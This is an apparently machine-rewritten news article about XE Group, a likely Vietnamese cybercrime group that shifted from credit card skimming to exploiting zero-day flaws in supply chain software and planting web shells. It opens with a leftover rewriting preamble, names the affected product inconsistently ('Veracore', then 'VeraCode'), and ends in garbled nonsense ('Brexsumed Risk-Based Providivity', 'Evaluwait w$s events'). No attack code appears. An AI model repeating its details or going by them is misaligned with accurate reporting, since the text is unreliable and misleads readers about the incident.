Here is the rewritten content, retaining its original length and proper heading and title format:

Cybercrime Group Expands to Target Information from Supply Chain Organizations

A cybercrime group long associated with credit card theft has expanded its activities to target information from supply chain organizations in the manufacturing and distribution sectors.

Zero-Day Exploits in Veracore

In a recent joint report, researchers from Intezer and Solis described the activity they observed as a sign of the heightened threat the group poses to organizations. "XE Group’s evolution from credit card skimming operations to exploiting zero-day vulnerabilities underscores their adaptability and growing sophistication," the researchers wrote. "By targeting supply chains in the manufacturing and distribution sectors, XE Group not only maximizes the impact of their operations but also demonstrates an acute understanding of systemic vulnerabilities."

XE Group: A Likely Vietnamese Threat Actor

XE Group is a likely Vietnamese threat actor that multiple vendors, including Malwarebytes, Volexity, and Menlo security, have tracked for years. The group first surfaced in 2013 and was known primarily for leveraging Web vulnerabilities to deploy malware for skimming credit card numbers and associated data from e-commerce sites. In June 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) identified XE Group as one of several threat actors exploiting vulnerabilities in Progress Telerik software running on government IIS servers and executing remote commands on them.

XE Group’s Long-Term Cyberattack Objectives

In several recent attacks, the threat actor has used zero-day vulnerabilities to deploy multiple Web shells on compromised systems. "In at least one instance, Solis and Intezer researchers discovered the threat actor had exploited one of the VeraCode vulnerabilities as far back as January 2020 and had maintained persistent access to the victim’s compromised environment since then," according to the joint report. "In 2024, the group reactivated a webshell initially deployed in January 2020, highlighting their ability to remain undetected and reengage targets."

XE Group’s Shift in Tactics and Targeting

The XE Group’s recent shift in tactics and targeting are consistent with a broader focus among threat actors on the software supply chain. Though SolarWinds remains perhaps the best-known example, there have been several other significant attacks on widely used software products and services. Examples include attacks on Progress Software’s MOVEit file transfer tool, a breach at Okta that affected all of its customers, and a breach at Accellion that allowed attackers to deploy ransomware on some of the company’s customers.

Expanding Threats and Compromised Environments

The XE Group’s recent attacks have highlighted the growing sophistication of the group, with the ability to maintain persistent access to systems and deploy multiple Web shells. The group’s willingness to target a wide range of systems and software has made it a significant threat to organizations involved in the manufacturing and distribution sectors.

Cross-Domain Attacks

The XE Group’s tactics have also expanded to cross-domain attacks. In at least one instance, the group was observed exploiting a vulnerability in ASP.Net sites, which were rarely targeted at the time. This expansion into cross-domain attacks highlights the group’s adaptability and growing expertise in exploiting vulnerabilities in widely deployed products.

Brexsumed Risk-Based Providivity

The recent attacks by the XE Group demonstrate the risk of brexsumed providivity posed by vulnerability in software supply chain. CIsumed Risk-Based Providivity Evaluwait w$s events“